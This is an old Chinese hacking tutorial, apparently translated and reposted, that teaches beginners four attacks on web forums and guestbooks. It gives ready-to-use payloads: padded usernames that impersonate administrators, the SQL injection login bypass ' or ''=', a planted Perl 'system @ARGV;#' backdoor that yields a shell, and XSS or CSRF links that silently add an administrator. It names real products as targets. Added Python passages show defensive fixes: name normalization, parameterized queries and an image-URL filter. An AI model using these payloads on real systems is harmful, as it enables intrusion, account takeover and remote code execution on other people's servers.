Constructing special characters to carry out intrusions

xiaoxiao2021-03-06  75

LCX

Analyzing a server's web programs, such as forums and chat rooms, finding the bugs or oversights their programmer left behind, and using them to get in through port 80 looks like something only hackers who write programs can do. In fact, even without writing any programs, a rookie can use special characters to break in through port 80. Don't believe it? Then take a look at the four little Li Feidao (flying knives) that I have carefully crafted out of special characters.

The first flying knife: fishing in troubled waters. We can use it to impersonate a name in a forum. Say you see a girl you like in the forum and want to tell the whole world, in her name, that she loves you; what do you do? Open Notepad and press the Tab key (or the Caps Lock+Tab combination), which produces a special space. Copy it and put that space after the name of the girl you admire. Other characters that form a special space are the AAAA, AAAB or AAAC sequences typed with the Location input method. There is also &nbsp;, which is a blank space in HTML markup and can be used as well. My experience is that AAAA/AAAB/AAAC from the Location input method have an extremely high success rate against programs written in ASP, while Tab and &nbsp; have a high success rate against PHP programs. Even more frightening: in the WDB forum and the IBB forum, a special username constructed with Tab gets the same permissions as the original user. If the original user is an administrator, the padded name you construct becomes an administrator too.
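As an added example (not code from the original article), here is one way a forum could catch this kind of look-alike registration on the server side: fold away Tab, &nbsp; and other space-like or invisible characters before comparing usernames. It assumes a Python registration check, and it treats the input-method "special spaces" as fullwidth or other compatibility characters, which is an assumption; the user list is constructed sample data.

```python
import html
import unicodedata
from typing import List

# Constructed sample data: names already registered on the forum.
EXISTING_USERS = ["admin", "xiaoli"]


def canonical_username(raw: str) -> str:
    """Reduce a submitted username to the form used for uniqueness checks.

    Folds the padding tricks described above: a trailing Tab, an HTML
    "&nbsp;" entity, and look-alike characters from an input method
    (assumed here to be fullwidth or other compatibility characters).
    """
    # Decode entities first so "&nbsp;" becomes U+00A0 instead of literal text.
    text = html.unescape(raw)
    # NFKC maps compatibility characters onto their plain forms, e.g. the
    # ideographic space U+3000 -> ' ' and fullwidth 'Ａ' -> 'A'.
    text = unicodedata.normalize("NFKC", text)
    kept = []
    for ch in text:
        category = unicodedata.category(ch)
        # Drop whitespace and every control/format character (Tab, NBSP,
        # zero-width joiners, ...) so they cannot tell two names apart.
        if ch.isspace() or category.startswith("C"):
            continue
        kept.append(ch)
    # Case-fold so "Admin" and "ADMIN" collide as well.
    return "".join(kept).casefold()


def registration_conflicts(existing: List[str], candidate: str) -> List[str]:
    """Return the existing names the candidate would be indistinguishable from."""
    canon = canonical_username(candidate)
    return [name for name in existing if canonical_username(name) == canon]


def is_acceptable(existing: List[str], candidate: str) -> bool:
    """Reject names that are empty after folding or that collide with a user."""
    canon = canonical_username(candidate)
    return bool(canon) and not registration_conflicts(existing, candidate)
```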

The second flying knife: crossing the sea under cover. In ASP dynamic web programming, the backend management area usually has a login page that checks the administrator's account and password. But this kind of authentication often has holes: for example, enter ' or ''=' in both the username and password boxes and you are into the management page. Why is that? Let me explain briefly. Look at the original program:

    user = request.form("user")
    pass = request.form("pass")
    ...
    SQL = "SELECT * from guestbook where user='" & user & "' and pass='" & pass & "'"

If we enter ' or ''=', the last line of SQL above becomes:

    SQL = "select * from guestbook where user='' or ''='' AND pass='' or ''=''"

If you know a little SQL you can see that the ' or ''=' we entered makes the program's condition evaluate to true, so we get through. Too abstract? The Confidence article management system has this vulnerability, and this set of programs is very widespread on the Internet. Look at the figure: use the special characters I gave you, enter ' or ''=', and you can get into the backend management.
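As an added example, not code from the article, the same login written two ways in Python with sqlite3: the string-concatenated query from the ASP snippet above, and a parameterized query that sends the inputs separately from the SQL text. The table and its admin row are constructed sample data.

```python
import sqlite3


def make_guestbook_db() -> sqlite3.Connection:
    """Constructed sample data: one admin row in a table named like the article's."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE guestbook (user TEXT, pass TEXT)")
    conn.execute("INSERT INTO guestbook VALUES ('admin', 'S3cret!')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, password: str) -> bool:
    # Same construction as the ASP snippet: the submitted text becomes part of
    # the SQL statement, so a quote in it ends the value and adds conditions.
    sql = ("SELECT * FROM guestbook WHERE user='" + user
           + "' AND pass='" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, user: str, password: str) -> bool:
    # The values travel separately from the statement text; whatever they
    # contain is compared as data and never changes the WHERE clause.
    sql = "SELECT * FROM guestbook WHERE user=? AND pass=?"
    return conn.execute(sql, (user, password)).fetchone() is not None


# The exact input the article describes, typed into both boxes.
BYPASS_INPUT = "' or ''='"

if __name__ == "__main__":
    db = make_guestbook_db()
    print("concatenated query, bypass input:",
          login_vulnerable(db, BYPASS_INPUT, BYPASS_INPUT))      # True
    print("parameterized query, bypass input:",
          login_parameterized(db, BYPASS_INPUT, BYPASS_INPUT))   # False
```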

The third flying knife: sneaking through Chencang. Recently there have been many articles about breaking into the LB forum, and without exception they all talk about constructing special characters. As everyone knows, if a CGI/Perl file contains the line system @ARGV;# then that line forms a web backdoor: requesting http://ip/*.pl?DIR (for a *.pl file containing system @ARGV;#) shows the physical directory of the website. Take AGBII, for example, a free CGI guestbook that is very popular online. The messages you leave in this guestbook are written out in sequence, as the nth message's username, title, content and so on, into a fixed directory, data/username. It sounds complicated, so look at the picture. As the picture shows, I have left a message on this site with the username ;system, the title @ARGV;# and the content haha. The contents of 10.pl in the data/222 directory are then as shown in the picture; look carefully at the message screenshot, this message is number 222. Then we request http://192.168.1.3/book/data/222/10.pl?DIR and get a shell.

The fourth flying knife: Taigong goes fishing. This is a more interesting but harder-to-use method: cross-site scripting. Let me talk about how a rookie can use it. First, something fun: UBB code has a bug when we post in the forum. If what you put inside [IMG][/IMG] is not an image but a JavaScript script, it executes too. Post a message with this content: [IMG]JavaScript:alert("hacker x file")[/IMG]. When someone clicks this post, a JS dialog box pops up, and we have advertised Hacker X Files. Write [IMG]JavaScript:alert("hacker x file");self.open("http://URL")[/IMG] and a new browser window opens after the dialog box. What if we put a web page Trojan on that page? We won't discuss web page Trojans here.

If we know that on this forum the URL that adds the administrator HACK is http://ip/bbs/updmin?user=hack (of course this URL has to be executed as an administrator), then we write that URL into the post and lure the forum's real administrator into reading it. When the logged-in administrator clicks the post, Hack, an ordinary registered user, becomes an administrator of the forum. A similar approach works with attachment uploads. We upload a TXT attachment whose content is this URL that adds the HACK administrator. Because of an IE bug, as long as the file on the website server is an HTML page, it is treated the same regardless of its extension. When the administrator clicks this TXT attachment, it likewise executes the URL that adds the HACK administrator. As for the HTML inside [img][/img] or in the txt file, we can construct the JavaScript carefully so that the forum administrator does not notice any URL being executed when clicking.
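As an added example that is not part of the original article: a server-side filter for [img] tags, in Python, that only turns a tag into an <img> element when its content is an http/https URL ending in an image extension, and otherwise shows the tag as literal text. The allowed schemes and extensions are my assumptions, as is stripping whitespace and control characters inside the URL (browsers ignore such characters within a scheme).

```python
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# [img]...[/img] in any letter case, content may span lines.
IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)
ALLOWED_SCHEMES = {"http", "https"}                       # assumption: never javascript:, data:, file:
ALLOWED_EXTENSIONS = (".gif", ".jpg", ".jpeg", ".png")    # assumption


def safe_image_url(raw: str) -> Optional[str]:
    """Return the URL if it is allowed as an image source, otherwise None."""
    # Decode entities so "java&#115;cript:" cannot hide the scheme, then drop
    # whitespace and control characters, which browsers ignore inside a
    # scheme ("java\tscript:" is still javascript: to them).
    url = "".join(ch for ch in html.unescape(raw) if ord(ch) > 32 and ord(ch) != 127)
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    if not parts.path.lower().endswith(ALLOWED_EXTENSIONS):
        return None
    return url


def render_ubb(text: str) -> str:
    """Turn [img] tags into <img> elements; everything else is HTML-escaped."""
    out = []
    pos = 0
    for match in IMG_TAG.finditer(text):
        out.append(html.escape(text[pos:match.start()]))
        url = safe_image_url(match.group(1))
        if url is None:
            # Rejected: show the tag as literal text rather than dropping it silently.
            out.append(html.escape(match.group(0)))
        else:
            out.append('<img src="%s">' % html.escape(url, quote=True))
        pos = match.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)
```

The extension check is only a heuristic: a server can still return an HTML page for a URL ending in .gif, so it does not replace sending proper Content-Type and X-Content-Type-Options headers on the attachment side.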

A final note: these four flying knives are not so sharp that they can slit the throat of every server, but against most forums, chat rooms and other web programs on the Internet... well... Xiao Li's flying knife lives up to its name.

Please credit the original address when reposting: https://www.9cbs.com/read-92000.html
